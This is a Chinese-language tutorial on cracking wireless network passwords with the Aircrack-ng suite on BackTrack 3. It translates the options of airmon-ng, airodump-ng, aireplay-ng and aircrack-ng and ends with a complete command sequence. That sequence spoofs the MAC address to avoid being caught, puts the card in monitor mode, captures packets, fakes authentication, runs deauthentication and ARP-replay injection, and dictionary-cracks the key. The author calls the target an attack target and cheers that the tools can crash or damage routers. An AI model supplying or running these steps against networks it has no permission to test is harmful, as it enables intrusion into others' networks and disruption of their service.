本文主要是針對無線網路的密碼破解，使用平臺 linux 2.26.21.5 ,實現環境 BACKTRACK 3 FINAL(USB),無線破解工具 Aircrack-ng ，官方網站http://www.aircrack-ng.org ，Aircrack-ng系列工具也有windows 平臺版本，但是本人的小黑的始終不能在win下抓包，所以只能 棄 win 從 lin 了，另外 win 下掃描到的 AP 也比 lin 下少了很多。其實 WIN 並不完整的支援 TCP/IP 協議族，有些協議 win 直接丟棄不用。網路本來從一開始就是 unix 的天下，win 只是在後來加入了網路的功能。

Aircrack-ng工具包有很多工具，我用到的工具主要有以下幾個：
airmon-ng 處理網絡卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng

發包，干擾
另外還要用到以下 linux 命令:
ifconfig 檢視修改網絡卡狀態和引數
macchanger 偽造 MAC
iwconfig 主要針對無線網絡卡的工具 (同 ifconfig)
iwlist 獲取無線網路的更詳細資訊
另外還有其他的 linux 基本命令，我就不提示了。

具體破解步驟：
1. 修改無線網絡卡狀態：先 down 掉
2. 偽造無線網絡卡的 MAC 地址：安全起見，減少被抓到的可能
3. 修改網絡卡工作模式：進入Monitor狀態，會產生一個虛擬的網絡卡
4. 修改無線網絡卡狀態： up
5. 檢視網路狀態，記錄下 AP 的 MAC 和本機的 MAC ，確定攻擊目標
6. 監聽抓包：生成 .cap 或 .ivs
7.

干擾無線網路：擷取無線資料包，傳送垃圾資料包，用來獲得更多的有效資料包
8. 破解 .cap 或 .ivs ，獲得 WEP 密碼，完成破解

下面詳細介紹一下各個命令的基本用法（參照命令的英文說明）

1. ifconfig
用來配置網絡卡，我們這裡主要用來 禁用和啟用 網絡卡：
ifconfig ath0 down
ifconfig ath0 up
禁用一下網絡卡的目的是為了下一步修改 MAC 。

2.macchanger
用來改變網絡卡的 MAC 地址，具體用法如下：
usage: macchanger [options] device
-h 顯示幫助
-V 顯示版本
-s 顯示當前MAC
-e 不改變mac,使用硬體廠商寫入的MAC
-a 自動生成一個同類型的MAC，同廠商的
-A 自動生成一個不同型別的MAC，不同廠商的
-r 生成任意MAC
-l 顯示已知廠商的網絡卡MAC地址分配，這個很有用，可以根據MAC查出來是哪個廠商生產的產品
-m 設定一個自定義的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。

3.airmon-ng
啟動無線網絡卡進入 Monitor 模式，
useage: airmon-ng <start|stop|check> <interface> [channel]
<start|stop|check> 啟動，停止，檢測
<interface> 指定無線網絡卡
[channel] 監聽頻道，現代大多數無線路由預設是 6，隨便掃描一下都是這個頻道，網管們應該換換了

4.iwconfig
專用的無線網絡卡配置工具，用來配置特殊的網路資訊，不帶引數時顯示可用網路。
useage：iwconfig interface [options]
[essid{NN|ON|OFF}] 指定essid號 開啟關閉
[nwid{NN|on|off}] 指定網路id號 開啟關閉
[mode {managed|ad-hoc|....}] 指定無線網路工作模式/型別
[freq N.NNNN[K|M|G]] 指定工作頻率
[channel N] 指定頻道
[ap {N|off|auto}] 指定AP號 關閉/自動
[sens N] sens 號
[nick N] nick 號
[rate {N|auto|fixed}] 速率控制
[rts {N|auto|fixed|off}] rts控制，如果不知道什麼是RTS，那就回去好好去學網路，不用往下看了
[frag {N|auto|fixed|off}] 碎片控制
[enc {NNNN-NNNN|off}] 範圍
[power {period N|timeout N}] 電源 頻率/超時
[retry {limit N|lifetime N}] 重試 限次/超時
[txpower N{mw|dBm}] 功率 毫瓦/分貝
[commit] 處理

5.iwlist
主要用來顯示無線網絡卡的一些附加資訊,同上
useage: iwlist [interface] options
scanning 掃描
frequency 頻率
channel 頻道
bitrate 速率
rate 速率
encryption 加密
key 金鑰
power 電源
txpower 功率
ap ap
accespoints ap
peers 直連
event 事件

6.airodump-ng
抓包工具,我最喜歡用的,詳細用法如下:
usage: airodump-ng <options> <interface>[,<interface>,...]

Options:
--ivs :僅將抓取資訊儲存為 .ivs
--gpsd :使用 GPSd
--write <prefix> :儲存為指定日檔名,我一般用這個,尤其是多個網路時,指定了也好區分
-w :同 --write
--beacons :儲存所有的 beacons ,預設情況況下是丟棄那些無用的資料包的
--update <secs> :顯示更新延遲,沒有用過
--showack :顯示ack/cts/rts狀態,還是那句,不知道rts就不用看了
-h :隱藏已知的,配合上面的選項使用
-f <msecs> :跳頻時間
--berlin <secs> :無資料包接收時延遲顯示的時間,這句不太好翻譯,意思是當那個訊號發出裝置沒有發出資料包多少時間之後,就停止對它的監視.預設120秒.建議學好英文去讀原文,翻 譯的都會有出入,這是我的理解.(mhy_mhy注)
-r <file> :從指定的檔案讀取資料包.我也想有人給我抓好包放哪裡,呵呵

Filter options:
--encrypt <suite> : 使用密碼序列過濾 AP
--netmask <netmask> : 使用掩碼過濾 AP
--bssid <bssid> : 使用 bssid 過濾 AP
-a : 過濾無關的客戶端

預設情況下使用2.4Ghz,你也可以指定其他的頻率,通過以下命令操作:

--channel <channels>:指定頻道
--band <abg> :制定頻寬
-C <frequencies> :指定頻率MHz
--cswitch <method> : 設定頻道交換方式
0 : FIFO (default) 先進先出(預設)
1 : Round Robin 迴圈
2 : Hop on last 最後一跳
-s : 同上
--help : 顯示使用方法,翻譯到這裡,感覺還是英文的貼切一點,建議讀原文

7.aireplay-ng

搞破壞的工具,注意殺傷力很大,甚至可以損壞劣質的 AP 裝置(小記憶體的路由器可能會重啟,或者徹底被破壞掉),我很喜歡這個東西,相信你也會喜歡的,使用時注意分寸.

usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid : AP的 MAC
-d dmac : 目標的 MAC
-s smac : 來源的 MAC
-m len : 最小包長度
-n len : 最大包長度
-u type : 幀控制, type field
-v subt : 幀控制, subtype field
-t tods : 幀控制, To DS bit
-f fromds : 幀控制, From DS bit
-w iswep : 幀控制, WEP bit
-D : 禁用 AP 發現功能

Replay options:

-x nbpps : 每秒包數量
-p fctrl : 框架設定 (hex)
-a bssid : 設定AP的 mac
-c dmac : 設定目標的 MAC
-h smac : 設定來源的 mac
-g value : 改變環快取大小 (預設8)
-F : 選擇第一個匹配的包

Fakeauth attack options:

-e essid : 設定目標 AP 的 SSID
-o npckts : 每秒爆破的包數量 (0 自動, 預設 1)
-q sec : 存活時間秒
-y prga : 共享可信的 key流

Arp Replay attack options:

-j : 注入 fromDS 資料包,還沒有用過這個選項

Fragmentation attack options:

-k IP : 設定目的IP 碎片
-l IP : 設定源IP碎片

Test attack options:

-B : 啟用 bitrate 測試

source options:

-i iface : 設定抓包的介面裝置
-r file : 從pcap檔案析取資料包

attack modes (Numbers can still be used): 攻擊模式，最具殺傷力的地方

--deauth count : 不信任一切 (-0)
--fakeauth delay : 欺騙AP的信任 (-1)
--interactive : 互動的選擇 (-2)
--arpreplay : 標準的 ARP-request replay (-3)
--chopchop : 解密 WEP 包 (-4)
--fragment : 生成有效的 key流 (-5)
--caffe-latte : 從客戶端獲取新的 IVs (-6)
--cfrag : 對客戶端進行碎片攻擊 (-7)
--test : 測試注射及效果 (-9)

--help : 顯示這個幫助,這部分是全部依照我的使用來翻譯,沒有完全準確的翻譯,主要對付 那些不給出作者就引用的人,鄙視抄襲.

8.aircrack-ng
破解KEY,漫長的過程.漫不漫長取決於兩個方面: 一是網管的聰明程度(能否設定出複雜的密碼),二是電腦的速度.

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Common options:

-a <amode> : 暴破 (1/WEP, 2/WPA-PSK)
-e <essid> : 選擇 essid 為目標
-b <bssid> : 選擇 ap的 mac 為目標,就是破解識別的關鍵字
-q : 使用安靜模式,無數出模式
-C <macs> : 將所有的 AP 合併為一個虛擬的

Static WEP cracking options:

-c : 僅搜尋字母數字
-t : 僅搜尋二進位制
-h : 搜尋數字關鍵字 (用於壞掉的部分),翻譯不出來了
-d <mask> : 指定掩碼(A1:XX:CF:YY)
-m <maddr> : 用 MAC 匹配可用的資料包
-n <nbits> : WEP 長度 64/128/152/256/512
-i <index> : WEP 索引(1 to 4), default: any
-f <fudge> : 暴破強度 預設2,原文字面意思是"禽獸強迫 捏造事實",呵呵
-k <korek> : 禁用一種破解方式 (1 to 17)
-x or -x0 : 禁用最新關鍵字暴破
-x1 : 使用最新關鍵字暴破 預設
-x2 : 用最新兩個位元組暴破
-y : 實驗單執行緒模式
-K : KoreK 攻擊 (pre-PTW)
-s : 顯示為 ASCII
-M <num> : 最大數量 ivs 使用
-D : WEP 非隱蔽模式
-P <num> : PTW debug: 1 disable Klein, 2 PTW
-1 : 嘗試一次 PTW

WEP and WPA-PSK cracking options:

-w <words> : 指定目錄檔案,可以多個
-r <DB> : 制定 airolib-ng 資料庫,不能和 -w 一起使用

--help : 顯示這個幫助

說明:

好了,用法都解釋完了,主要是後面這三個命令,這是我從英文譯過來的,結合我的使用情況,以及我的理解.引數全,沒有漏掉任何一項,可能我是第一個把這個完整翻譯過來的,之前我沒有找到有翻譯好的,有些地方並不是準確的遵循原文,希望感興趣的朋友在轉載的時候註上我:mhy_mhy.

下面以我的硬體例項來操作一下:
我的硬體是 atheros 的 a/b/g 無線網絡卡，在 linux 中顯示為 ath0 ，我只列出我常用的命令步驟，不再做任何解釋：

ifconfig ath0 down
macchanger -r ath0
macchanger -r wifi0
ifconfig ath1 up
airmon-ng start ath1 6
iwconfig ath1
iwlist ath1 scanning
airodump-ng -w *.cap -c 6 ath1

aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1
aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1

aircrack-ng -x -f 2 *.cap
aircrack-ng -w passdict.txt *.cap
aircrack-ng -n 64 -b apmac *.ivs
aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap